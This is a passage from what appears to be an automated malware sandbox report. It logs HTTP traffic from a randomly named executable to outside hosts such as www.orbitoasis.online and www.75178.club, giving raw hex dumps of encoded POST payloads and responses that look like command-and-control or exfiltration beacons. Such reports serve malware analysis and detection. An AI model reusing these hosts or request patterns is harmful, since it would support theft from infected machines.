                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 43 4e 53 6d 47 73 43 71 44 70 59 56 31 61 39 53 49 69 43 47 2b 30 42 44 4e 6e 6d 56 79 32 72 33 70 69 58 7a 53 2f 4c 6c 45 55 70 57 37 47 38 54 42 59 59 4c 72 32 53 51 2f 35 70 4e 59 7a 4e 64 65 63 68 53 46 36 33 43 6e 38 47 34 53 61 48 64 59 50 44 64 41 58 42 59 65 79 6a 57 32 34 36 79 72 36 77 67 32 31 61 45 6c 66 39 50 4c 63 4c 45 4d 67 37 56 38 6f 74 7a 37 52 42 4c 74 76 34 58 49 2b 6a 34 4a 38 2b 34 31 57 41 78 57 4c 66 30 5a 74 72 54 30 4e 6c 75 50 4b 68 41 74 56 31 38 51 30 75 76 42 6b 77 37 62 75 53 51 32 53 34 65 45 33 70 70 67 4e 4d 6e 58 68 55 35 2f 38 5a 39 4b 6e 56 4b 30 6f 76 51 45 48 36 38 64 43 75 77 7a 56 66 36 4e 55 50 2b 54 48 6f 6f 64 4f 47 4b 50 39 30 74 4c 55 46 64 70 34 67 6b 52 57 55 2b 31 70 32 50 42 57 38 55 65 70 5a 4e 72 69 4a 67 57 70 4e 54 39 49 6a 5a 46 7a 69 46 2b 50 77 48 62 39 4b 55 48 72 69 70 5a 56 67 34 48 76 5a 6b 68 33 78 32 59 63 63 43 6e 4b 79 31 66 41 2f 54 79 48 56 2f 4a 38 64 35 4a 71 4e 34 61 6e 7a 31 7a 4f 4a 75 62 6e 4f 67 72 63 39 4b 34 [TRUNCATED]
                                                                      Data Ascii: xP7x=CNSmGsCqDpYV1a9SIiCG+0BDNnmVy2r3piXzS/LlEUpW7G8TBYYLr2SQ/5pNYzNdechSF63Cn8G4SaHdYPDdAXBYeyjW246yr6wg21aElf9PLcLEMg7V8otz7RBLtv4XI+j4J8+41WAxWLf0ZtrT0NluPKhAtV18Q0uvBkw7buSQ2S4eE3ppgNMnXhU5/8Z9KnVK0ovQEH68dCuwzVf6NUP+THoodOGKP90tLUFdp4gkRWU+1p2PBW8UepZNriJgWpNT9IjZFziF+PwHb9KUHripZVg4HvZkh3x2YccCnKy1fA/TyHV/J8d5JqN4anz1zOJubnOgrc9K4csRRJiiEOuAM9TThpsAXQObZF9lhHFxVlGJUDw2bHdGAg1/JhCU0UtmJSNKSV1I2NYRQ/9ExH7RGhFg5s+ZULd9XkGvLZdRhyGqsd33wO/k+dDYMLW3LUpTkH4ot23Ab/9Kn18fpx+MlOPvI93zTXp+Dj8ud1hjPoJaC/v6U+cN+QSEr8Y74c+mwy0+sCfrcNKBmKWWk2ZXKjpyA2h/s/5wpTpyHWiSubWTjYaeHyNJDjPO6rswHH/X44dEJZIfV7k2Y6uckcVwftdDkEEzgxKr3f2eRwpX/KVbmAhmWNjKuRqlfzq8T5e1KGaDQokkCIXUwUT4gF9cHpfpy0N+aSOkjANCbqkkKU0Ug8UrbrnXF6EDkXMSbstsa4TTYb92+xRIgKCnYj3nI4BzJ4ieEberEd/HHHStvAfaR5bzG7cIBtfLvLVEh+s1UrLOrf1SqJ+Kr1xyFCJqV0wsm6riJBlwFBZkNzMtc+nsDhimrQ52oabWMuKmh5yQDvz5kYV1ughEW3L5rN3mLMtRT1d5ErOlRlEq7KaSro5DspYLaAg7RUBMZjN51nyoPrLta0lk1TiEDq2VRNZYkrmEXXEdf6EM2C61wPYp34gf4UAQSiVWyEj2rluJseDHM0YgowAMCsapORGOMM7QVyLjSN0OlQ4vgkn1mMAG+rd [TRUNCATED]


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      4192.168.2.44974023.167.152.41803752C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 8, 2025 16:13:13.637958050 CET486OUTGET /a4h7/?xP7x=PP6GFaOQILwxi5diAyqRnR0HCUuPn1KM7xDYUPH7LXca8g8uO5tY4GvA0apkUDdsINAyEZvfq9K0A+PIYqHQKmR9Tyuvz8OKoog24WuNruFHA9eSGHCBo40=&F4=Q0yHy HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.75178.club
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      5192.168.2.44974166.29.132.194803752C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 8, 2025 16:13:19.033127069 CET770OUTPOST /k6yn/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.orbitoasis.online
                                                                      Origin: http://www.orbitoasis.online
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 201
                                                                      Connection: close
                                                                      Referer: http://www.orbitoasis.online/k6yn/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 67 50 42 36 32 5a 47 32 79 50 65 30 50 6d 62 50 61 63 6c 65 76 75 48 76 45 39 4e 61 4c 32 51 6c 49 53 38 74 31 48 76 4b 75 31 68 76 34 78 67 47 6f 42 64 61 4a 35 67 59 4f 34 58 56 46 69 41 47 57 73 76 6d 36 51 67 68 59 73 4d 4a 31 65 74 30 50 4b 4a 69 30 41 61 49 35 35 6f 66 69 50 34 50 66 4b 75 57 69 37 56 4e 67 47 46 59 31 39 6a 73 6e 4f 41 67 7a 47 72 33 38 6b 59 54 6f 42 6b 5a 69 72 5a 6a 30 4a 6d 46 32 6c 46 34 34 59 62 74 6c 32 52 46 6b 67 4d 32 44 48 48 6c 66 4a 42 58 39 67 2f 78 7a 52 6b 6b 68 63 75 55 44 6e 61 4a 71 72 76 33 35 72 61 57 43 71 68 4f 4e 47 4d 4e 79 41 3d 3d
                                                                      Data Ascii: xP7x=gPB62ZG2yPe0PmbPaclevuHvE9NaL2QlIS8t1HvKu1hv4xgGoBdaJ5gYO4XVFiAGWsvm6QghYsMJ1et0PKJi0AaI55ofiP4PfKuWi7VNgGFY19jsnOAgzGr38kYToBkZirZj0JmF2lF44Ybtl2RFkgM2DHHlfJBX9g/xzRkkhcuUDnaJqrv35raWCqhONGMNyA==
                                                                      Jan 8, 2025 16:13:19.609467030 CET1236INHTTP/1.1 404 Not Found
                                                                      keep-alive: timeout=5, max=100
                                                                      content-type: text/html
                                                                      transfer-encoding: chunked
                                                                      content-encoding: gzip
                                                                      vary: Accept-Encoding
                                                                      date: Wed, 08 Jan 2025 15:13:19 GMT
                                                                      server: LiteSpeed
                                                                      x-turbo-charged-by: LiteSpeed
                                                                      connection: close
                                                                      Data Raw: 31 33 35 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 05 44 6f f7 ec ea 86 24 40 42 12 08 10 0e c7 09 dd 25 74 45 77 d8 f0 03 f9 35 fc 64 2e d1 dd d3 34 d3 7d 66 d6 e1 1f ae f9 d1 a8 2e 59 59 99 5f 66 d6 64 d6 6f bf fd f6 f8 4f ec 92 59 1b 0a 37 08 aa 24 fe f6 db e3 f3 9f 01 68 8f 81 6b 3a df 7e bb fc 4c dc ca 04 33 aa fc de 3d d6 61 f3 74 c7 64 69 e5 a6 d5 7d 75 ca dd bb 81 fd fc f5 74 57 b9 5d 05 f7 24 fe 32 b0 03 b3 28 dd ea a9 ae bc 7b f2 ee 53 3a a6 1d b8 f7 fd fa 22 8b af 08 a5 d9 bd dd 0f 7d ba 50 29 4c 3f 31 ff 91 15 5c 97 87 85 5b 5e 2d 41 de 51 4f cd c4 7d ba 6b 42 b7 cd b3 a2 ba 9a d6 86 4e 15 3c 39 6e 13 da ee fd e5 e3 cb 20 4c c3 2a 34 e3 fb d2 36 63 f7 09 fd fa 9d 54 15 56 b1 fb 8d 40 88 81 9c 55 83 69 56 a7 ce 23 fc dc f9 2c ca b2 3a c5 ee a0 97 db 8b b8 ec b2 7c e1 a3 17 b5 95 39 a7 c1 df 2f 53 fb cf be 79 40 3a f7 9e 99 84 f1 e9 61 40 15 60 db 2f 03 c1 8d 1b b7 0a 6d f3 cb a0 34 d3 f2 be 74 8b d0 fb cb 8f cb ca f0 ec 3e 0c 50 22 ef de [TRUNCATED]
                                                                      Data Ascii: 1350ZJrnhztDo$@B%tEw5d.4}f.YY_fdoOY7$hk:~L3=atdi}utW]$2({S:"}P)L?1\[^-AQO}kBN<9n L*46cTV@UiV#,:|9/Sy@:a@`/m4t>P"anJ`p,#TgK{?uMSap;kWa~G*ylYXqfG}g}z@Jf]e7{.(r~tn*WZ^VfU@;{g_hue~^!8.]^}o>Z7wM3F+6)z?ulziocWPN>!Io<?>n*Kou%tt=x%woq0{=KqU6>!{6Mg[yeFd}_cg/a|*C7{Erw8az~8mpCp7_ot F}zGp&^n%>ZY)A07=_: +%n],yVCar+wt~Dry
                                                                      Jan 8, 2025 16:13:19.609481096 CET1236INData Raw: 33 3e 25 50 02 7f 53 c3 1b 3f 7f 4b 5c 27 34 07 7f 4a 80 23 7d 51 cc 78 44 e6 dd 9f 6f b6 b9 45 ed cd 70 2f bc 3c 2b 2f 11 ea 61 50 b8 31 f0 75 cd 8d 01 f6 73 7a 8f 05 ec a7 7d 18 04 a1 e3 b8 e9 1b 4b fd 68 df ae e2 d3 05 d9 cf 76 fd 7e de 1b fb
                                                                      Data Ascii: 3>%PS?K\'4J#}QxDoEp/<+/aP1usz}Khv~[>"Vx\z*/RnH_}o@Q^Xwia|S|zv]=@]ROoOg>Fz{21dWo^3oeZer^o>z=
                                                                      Jan 8, 2025 16:13:19.609491110 CET1236INData Raw: 4c c0 ed c2 65 89 4f 16 b0 68 b4 e1 b2 d3 04 df e5 e6 76 62 49 e2 c4 b6 05 8d 71 3a dd 35 cc 74 9a ab 33 89 d6 59 71 da b5 a8 1d cc 42 9a ca 92 e8 8c 77 04 1e 43 69 bd e5 93 6d 10 a9 25 62 8e 8c b1 21 6c dc f1 18 4b d0 6a 1f eb 34 17 cc c5 49 34
                                                                      Data Ascii: LeOhvbIq:5t3YqBwCim%b!lKj4I4JGZf12,850nm2@gs1hquQiLOq{wKA:TZ$T\rCiIMwz tz5Jshy)Sy5>*PMQ](
                                                                      Jan 8, 2025 16:13:19.609503984 CET1236INData Raw: 2c b0 33 da 10 c0 a8 15 ba 69 cf c7 65 5c af 9b 80 a5 37 34 66 12 e2 a9 83 09 bd 5b 14 1d e9 67 27 7b 8b e8 9c bf 24 4e d8 02 17 20 3d 1e ee 44 98 68 32 7b 54 ec 23 0a a7 f3 06 4f 0f de 0a 4e 03 6d 4c a2 c0 35 cb a3 8a 58 ba db 4e ed ea 28 f5 eb
                                                                      Data Ascii: ,3ie\74f[g'{$N =Dh2{T#ONmL5XN("JUb2},$H0)fGHl(<z{x;:2Ng9KP4tfoYwUdnbz#vqPnnN*Hs2ev&4A1pe|'4<z]dvV-NZ).RiAw
                                                                      Jan 8, 2025 16:13:19.609514952 CET292INData Raw: 8c 79 b6 b6 b7 5c f3 dd 00 fe 09 f9 ab 43 5d 67 97 3f 39 cb 35 fb 1f 62 f6 33 4c fd e9 05 54 7f fe 54 12 97 c3 be d7 e3 f5 6e cf c3 7f 24 2d 20 ca 77 02 78 16 d3 dd b7 47 f8 b3 55 8f f0 47 aa b9 01 d3 07 7c 5d 39 86 57 16 1f 9f 0b 7a ef 85 fd cb
                                                                      Data Ascii: y\C]g?95b3LTTn$- wxGUG|]9Wzzdhn5J~/6H+cu:.=Vwti&jOCO*{&QS72S'y[_8/7LOwr70~k^w/PBGkjYm


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      6192.168.2.44974266.29.132.194803752C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 8, 2025 16:13:21.579884052 CET790OUTPOST /k6yn/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.orbitoasis.online
                                                                      Origin: http://www.orbitoasis.online
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 221
                                                                      Connection: close
                                                                      Referer: http://www.orbitoasis.online/k6yn/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 67 50 42 36 32 5a 47 32 79 50 65 30 4f 46 54 50 4a 74 6c 65 74 4f 48 73 59 74 4e 61 65 47 52 4e 49 54 41 74 31 47 37 67 76 44 78 76 35 51 51 47 76 41 64 61 4f 35 67 59 46 59 58 4d 4c 43 41 37 57 73 79 5a 36 54 34 68 59 74 6f 4a 31 66 64 30 4f 37 4a 39 31 51 61 4b 73 70 6f 64 39 66 34 50 66 4b 75 57 69 37 42 7a 67 43 52 59 31 4f 72 73 6e 73 34 6a 2b 6d 72 77 32 45 59 54 69 52 6b 64 69 72 5a 52 30 4c 53 2f 32 6e 39 34 34 64 6e 74 69 6e 52 47 76 67 4d 73 41 33 47 32 50 62 4d 67 77 67 6d 6c 2b 44 38 49 6a 63 7a 77 4c 42 58 54 37 61 4f 67 72 72 2b 6c 66 74 6f 36 41 46 78 45 70 4f 38 2f 76 64 32 4f 34 50 57 51 73 35 39 2f 41 69 2f 31 58 77 34 3d
                                                                      Data Ascii: xP7x=gPB62ZG2yPe0OFTPJtletOHsYtNaeGRNITAt1G7gvDxv5QQGvAdaO5gYFYXMLCA7WsyZ6T4hYtoJ1fd0O7J91QaKspod9f4PfKuWi7BzgCRY1Orsns4j+mrw2EYTiRkdirZR0LS/2n944dntinRGvgMsA3G2PbMgwgml+D8IjczwLBXT7aOgrr+lfto6AFxEpO8/vd2O4PWQs59/Ai/1Xw4=
                                                                      Jan 8, 2025 16:13:22.180773020 CET1236INHTTP/1.1 404 Not Found
                                                                      keep-alive: timeout=5, max=100
                                                                      content-type: text/html
                                                                      transfer-encoding: chunked
                                                                      content-encoding: gzip
                                                                      vary: Accept-Encoding
                                                                      date: Wed, 08 Jan 2025 15:13:22 GMT
                                                                      server: LiteSpeed
                                                                      x-turbo-charged-by: LiteSpeed
                                                                      connection: close
                                                                      Data Raw: 31 33 35 41 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 05 44 6f f7 ec ea 86 24 40 42 12 08 10 0e c7 09 dd 25 74 45 77 d8 f0 03 f9 35 fc 64 2e d1 dd d3 34 d3 7d 66 d6 e1 1f ae f9 d1 a8 2e 59 59 99 5f 66 d6 64 d6 6f bf fd f6 f8 4f ec 92 59 1b 0a 37 08 aa 24 fe f6 db e3 f3 9f 01 68 8f 81 6b 3a df 7e bb fc 4c dc ca 04 33 aa fc de 3d d6 61 f3 74 c7 64 69 e5 a6 d5 7d 75 ca dd bb 81 fd fc f5 74 57 b9 5d 05 f7 24 fe 32 b0 03 b3 28 dd ea a9 ae bc 7b f2 ee 53 3a a6 1d b8 f7 fd fa 22 8b af 08 a5 d9 bd dd 0f 7d ba 50 29 4c 3f 31 ff 91 15 5c 97 87 85 5b 5e 2d 41 de 51 4f cd c4 7d ba 6b 42 b7 cd b3 a2 ba 9a d6 86 4e 15 3c 39 6e 13 da ee fd e5 e3 cb 20 4c c3 2a 34 e3 fb d2 36 63 f7 09 fd fa 9d 54 15 56 b1 fb 8d 40 88 81 9c 55 83 69 56 a7 ce 23 fc dc f9 2c ca b2 3a c5 ee a0 97 db 8b b8 ec b2 7c e1 a3 17 b5 95 39 a7 c1 df 2f 53 fb cf be 79 40 3a f7 9e 99 84 f1 e9 61 40 15 60 db 2f 03 c1 8d 1b b7 0a 6d f3 cb a0 34 d3 f2 be 74 8b d0 fb cb 8f cb ca f0 ec 3e 0c 50 22 ef de [TRUNCATED]
                                                                      Data Ascii: 135AZJrnhztDo$@B%tEw5d.4}f.YY_fdoOY7$hk:~L3=atdi}utW]$2({S:"}P)L?1\[^-AQO}kBN<9n L*46cTV@UiV#,:|9/Sy@:a@`/m4t>P"anJ`p,#TgK{?uMSap;kWa~G*ylYXqfG}g}z@Jf]e7{.(r~tn*WZ^VfU@;{g_hue~^!8.]^}o>Z7wM3F+6)z?ulziocWPN>!Io<?>n*Kou%tt=x%woq0{=KqU6>!{6Mg[yeFd}_cg/a|*C7{Erw8az~8mpCp7_ot F}zGp&^n%>ZY)A07=_: +%n],yVCar+wt~Dry
                                                                      Jan 8, 2025 16:13:22.180787086 CET1236INData Raw: 33 3e 25 50 02 7f 53 c3 1b 3f 7f 4b 5c 27 34 07 7f 4a 80 23 7d 51 cc 78 44 e6 dd 9f 6f b6 b9 45 ed cd 70 2f bc 3c 2b 2f 11 ea 61 50 b8 31 f0 75 cd 8d 01 f6 73 7a 8f 05 ec a7 7d 18 04 a1 e3 b8 e9 1b 4b fd 68 df ae e2 d3 05 d9 cf 76 fd 7e de 1b fb
                                                                      Data Ascii: 3>%PS?K\'4J#}QxDoEp/<+/aP1usz}Khv~[>"Vx\z*/RnH_}o@Q^Xwia|S|zv]=@]ROoOg>Fz{21dWo^3oeZer^o>z=
                                                                      Jan 8, 2025 16:13:22.180795908 CET448INData Raw: 4c c0 ed c2 65 89 4f 16 b0 68 b4 e1 b2 d3 04 df e5 e6 76 62 49 e2 c4 b6 05 8d 71 3a dd 35 cc 74 9a ab 33 89 d6 59 71 da b5 a8 1d cc 42 9a ca 92 e8 8c 77 04 1e 43 69 bd e5 93 6d 10 a9 25 62 8e 8c b1 21 6c dc f1 18 4b d0 6a 1f eb 34 17 cc c5 49 34
                                                                      Data Ascii: LeOhvbIq:5t3YqBwCim%b!lKj4I4JGZf12,850nm2@gs1hquQiLOq{wKA:TZ$T\rCiIMwz tz5Jshy)Sy5>*PMQ](
                                                                      Jan 8, 2025 16:13:22.180807114 CET1236INData Raw: cb b1 47 66 1b ce 9a 93 d4 70 38 52 d5 39 b2 90 8b f5 01 ab c2 ad 67 4f d3 00 09 14 31 37 b8 0d 7f 48 68 ca c5 ac c9 50 c7 5b a9 0b b3 90 2b b4 04 4b eb c0 21 55 8d a1 48 b1 5d 6b d4 16 5d 8e 15 aa b4 2a 46 39 49 92 3f cb 21 14 16 cd ee c8 53 da
                                                                      Data Ascii: Gfp8R9gO17HhP[+K!UH]k]*F9I?!S*@kpF38'!6I;ywV4-*"g)W3*i$v#TsT2r,.,$p][YZL'939}ZvS7YE<tz@4Q
                                                                      Jan 8, 2025 16:13:22.180825949 CET1075INData Raw: 80 a2 1f 2e 59 c3 13 2a 8b f2 11 b2 dc 3d 08 98 0e 49 8c 86 e3 56 31 3c 99 cc f7 b4 8d f8 d0 6c 1e ce 8d 50 2e 26 05 d1 a0 fb a2 71 ac ca 3c e7 e8 68 bd 62 96 de 3e cf a5 90 67 47 e1 e6 58 60 63 34 db 64 91 3e a2 66 13 7d 38 e5 d3 9d d8 b6 c3 44
                                                                      Data Ascii: .Y*=IV1<lP.&q<hb>gGX`c4d>f}8Dt"j2<q84bm;p6e&JaT:5aVB0t8<7s!n)*Wf-%zO`XI(B46;PIIdlbk$Fr6,eCD


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      7192.168.2.44974566.29.132.194803752C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 8, 2025 16:13:24.128179073 CET10872OUTPOST /k6yn/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.orbitoasis.online
                                                                      Origin: http://www.orbitoasis.online
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 10301
                                                                      Connection: close
                                                                      Referer: http://www.orbitoasis.online/k6yn/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 67 50 42 36 32 5a 47 32 79 50 65 30 4f 46 54 50 4a 74 6c 65 74 4f 48 73 59 74 4e 61 65 47 52 4e 49 54 41 74 31 47 37 67 76 44 35 76 35 6d 6b 47 76 6a 46 61 50 35 67 59 47 59 58 52 4c 43 41 71 57 73 37 51 36 55 77 62 59 76 67 4a 31 38 56 30 48 76 6c 39 37 51 61 4b 7a 5a 6f 51 69 50 34 67 66 4f 79 61 69 37 52 7a 67 43 52 59 31 50 37 73 68 2b 41 6a 74 32 72 33 38 6b 59 58 6f 42 6b 6c 69 71 77 6d 30 4c 57 76 32 57 64 34 34 39 58 74 6a 52 4e 47 7a 77 4d 71 4a 6e 48 78 50 62 41 2f 77 67 36 70 2b 43 49 6d 6a 65 76 77 4a 67 36 50 73 71 4f 58 2f 70 79 74 49 64 6b 45 50 6b 67 4a 67 4f 52 45 73 49 79 61 6b 50 66 6e 68 37 6f 59 52 68 2f 44 56 48 51 68 6e 49 68 6f 7a 4f 39 52 59 6a 53 78 71 56 32 56 2b 5a 35 7a 63 38 4b 42 61 32 34 6c 44 47 5a 35 6a 6b 35 66 4a 66 49 4a 4c 48 68 53 48 32 6e 4d 72 35 4f 68 55 48 7a 5a 74 4e 30 71 75 32 2b 66 57 37 6a 41 65 6c 6d 59 52 59 57 52 37 52 6a 79 52 48 6b 4d 68 4f 70 6d 46 76 4c 41 75 32 67 54 76 54 37 2b 42 43 4e 6d 43 48 66 64 4b 5a 62 72 31 67 79 35 52 [TRUNCATED]
                                                                      Data Ascii: xP7x=gPB62ZG2yPe0OFTPJtletOHsYtNaeGRNITAt1G7gvD5v5mkGvjFaP5gYGYXRLCAqWs7Q6UwbYvgJ18V0Hvl97QaKzZoQiP4gfOyai7RzgCRY1P7sh+Ajt2r38kYXoBkliqwm0LWv2Wd449XtjRNGzwMqJnHxPbA/wg6p+CImjevwJg6PsqOX/pytIdkEPkgJgOREsIyakPfnh7oYRh/DVHQhnIhozO9RYjSxqV2V+Z5zc8KBa24lDGZ5jk5fJfIJLHhSH2nMr5OhUHzZtN0qu2+fW7jAelmYRYWR7RjyRHkMhOpmFvLAu2gTvT7+BCNmCHfdKZbr1gy5RI4RHB2kWRPf3F9ApplqzcxZPHpjShW6pnlEKhWXZEE7WQLd6UXkmFRqd5ZHezkeLwM1zfFNUwcCcdVX3Rxpi+QlQ8dnlXR8xMX5uAWkYiqVx3OORwH2kKWwDRqAFzIEAlgt2x6wPQvP7EC9j8VyKsxDYxn5++F434qrMyuLgo6pkpGlbpyOq0U+lO7UNoRjc2+7naG5jHrMkDTj4GdC9Zv4FyeU+VJdsfWIwV50qeBMVjsq35rdMxLhLzYFlocFGIm+Ws/wBtZKS/6uBhiLC8/v5RkGpgUIyeBnIE+AlySqau+wEqOJ5eR6m4tpQZaxihvbug/7XDAhzaNkhGQm5aIlW2S3WrHZEqH/CEvb8h2IjAduyJbkahMk1JfJrR2IJDhx4R055MlAwynx+4tRP8jjTgF3+To+xnWIWWqjesdO3sOaTse09VEs0pqGE05oynYVGAAh2eoJg/SFsixOspD2CuDmej5GoBzyISd0HTwwLCf8zE+3ujP7/F1W7N/0wi9EbOKiO/smUpehzjvLbepvurDkmHGeQVXtgBxd4oYQLEgRiGC3QJWgs6TaHarcpDzfJL+FEbj4fuPLWL0SzAEWxV+uAL0LzoxJUrAbj6E7QN7EIo6yo3fjslOIuyhtNgGzp0KEI9WhwGKUR8xGYyHuKXodDpNBc+e [TRUNCATED]
                                                                      Jan 8, 2025 16:13:24.849272013 CET1236INHTTP/1.1 404 Not Found
                                                                      keep-alive: timeout=5, max=100
                                                                      content-type: text/html
                                                                      transfer-encoding: chunked
                                                                      content-encoding: gzip
                                                                      vary: Accept-Encoding
                                                                      date: Wed, 08 Jan 2025 15:13:24 GMT
                                                                      server: LiteSpeed
                                                                      x-turbo-charged-by: LiteSpeed
                                                                      connection: close
                                                                      Data Raw: 31 33 35 41 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 05 44 6f f7 ec ea 86 24 40 42 12 08 10 0e c7 09 dd 25 74 45 77 d8 f0 03 f9 35 fc 64 2e d1 dd d3 34 d3 7d 66 d6 e1 1f ae f9 d1 a8 2e 59 59 99 5f 66 d6 64 d6 6f bf fd f6 f8 4f ec 92 59 1b 0a 37 08 aa 24 fe f6 db e3 f3 9f 01 68 8f 81 6b 3a df 7e bb fc 4c dc ca 04 33 aa fc de 3d d6 61 f3 74 c7 64 69 e5 a6 d5 7d 75 ca dd bb 81 fd fc f5 74 57 b9 5d 05 f7 24 fe 32 b0 03 b3 28 dd ea a9 ae bc 7b f2 ee 53 3a a6 1d b8 f7 fd fa 22 8b af 08 a5 d9 bd dd 0f 7d ba 50 29 4c 3f 31 ff 91 15 5c 97 87 85 5b 5e 2d 41 de 51 4f cd c4 7d ba 6b 42 b7 cd b3 a2 ba 9a d6 86 4e 15 3c 39 6e 13 da ee fd e5 e3 cb 20 4c c3 2a 34 e3 fb d2 36 63 f7 09 fd fa 9d 54 15 56 b1 fb 8d 40 88 81 9c 55 83 69 56 a7 ce 23 fc dc f9 2c ca b2 3a c5 ee a0 97 db 8b b8 ec b2 7c e1 a3 17 b5 95 39 a7 c1 df 2f 53 fb cf be 79 40 3a f7 9e 99 84 f1 e9 61 40 15 60 db 2f 03 c1 8d 1b b7 0a 6d f3 cb a0 34 d3 f2 be 74 8b d0 fb cb 8f cb ca f0 ec 3e 0c 50 22 ef de [TRUNCATED]
                                                                      Data Ascii: 135AZJrnhztDo$@B%tEw5d.4}f.YY_fdoOY7$hk:~L3=atdi}utW]$2({S:"}P)L?1\[^-AQO}kBN<9n L*46cTV@UiV#,:|9/Sy@:a@`/m4t>P"anJ`p,#TgK{?uMSap;kWa~G*ylYXqfG}g}z@Jf]e7{.(r~tn*WZ^VfU@;{g_hue~^!8.]^}o>Z7wM3F+6)z?ulziocWPN>!Io<?>n*Kou%tt=x%woq0{=KqU6>!{6Mg[yeFd}_cg/a|*C7{Erw8az~8mpCp7_ot F}zGp&^n%>ZY)A07=_: +%n],yVCar+wt~Dry
                                                                      Jan 8, 2025 16:13:24.849287987 CET1236INData Raw: 33 3e 25 50 02 7f 53 c3 1b 3f 7f 4b 5c 27 34 07 7f 4a 80 23 7d 51 cc 78 44 e6 dd 9f 6f b6 b9 45 ed cd 70 2f bc 3c 2b 2f 11 ea 61 50 b8 31 f0 75 cd 8d 01 f6 73 7a 8f 05 ec a7 7d 18 04 a1 e3 b8 e9 1b 4b fd 68 df ae e2 d3 05 d9 cf 76 fd 7e de 1b fb
                                                                      Data Ascii: 3>%PS?K\'4J#}QxDoEp/<+/aP1usz}Khv~[>"Vx\z*/RnH_}o@Q^Xwia|S|zv]=@]ROoOg>Fz{21dWo^3oeZer^o>z=
                                                                      Jan 8, 2025 16:13:24.849298954 CET448INData Raw: 4c c0 ed c2 65 89 4f 16 b0 68 b4 e1 b2 d3 04 df e5 e6 76 62 49 e2 c4 b6 05 8d 71 3a dd 35 cc 74 9a ab 33 89 d6 59 71 da b5 a8 1d cc 42 9a ca 92 e8 8c 77 04 1e 43 69 bd e5 93 6d 10 a9 25 62 8e 8c b1 21 6c dc f1 18 4b d0 6a 1f eb 34 17 cc c5 49 34
                                                                      Data Ascii: LeOhvbIq:5t3YqBwCim%b!lKj4I4JGZf12,850nm2@gs1hquQiLOq{wKA:TZ$T\rCiIMwz tz5Jshy)Sy5>*PMQ](
                                                                      Jan 8, 2025 16:13:24.849308968 CET1236INData Raw: cb b1 47 66 1b ce 9a 93 d4 70 38 52 d5 39 b2 90 8b f5 01 ab c2 ad 67 4f d3 00 09 14 31 37 b8 0d 7f 48 68 ca c5 ac c9 50 c7 5b a9 0b b3 90 2b b4 04 4b eb c0 21 55 8d a1 48 b1 5d 6b d4 16 5d 8e 15 aa b4 2a 46 39 49 92 3f cb 21 14 16 cd ee c8 53 da
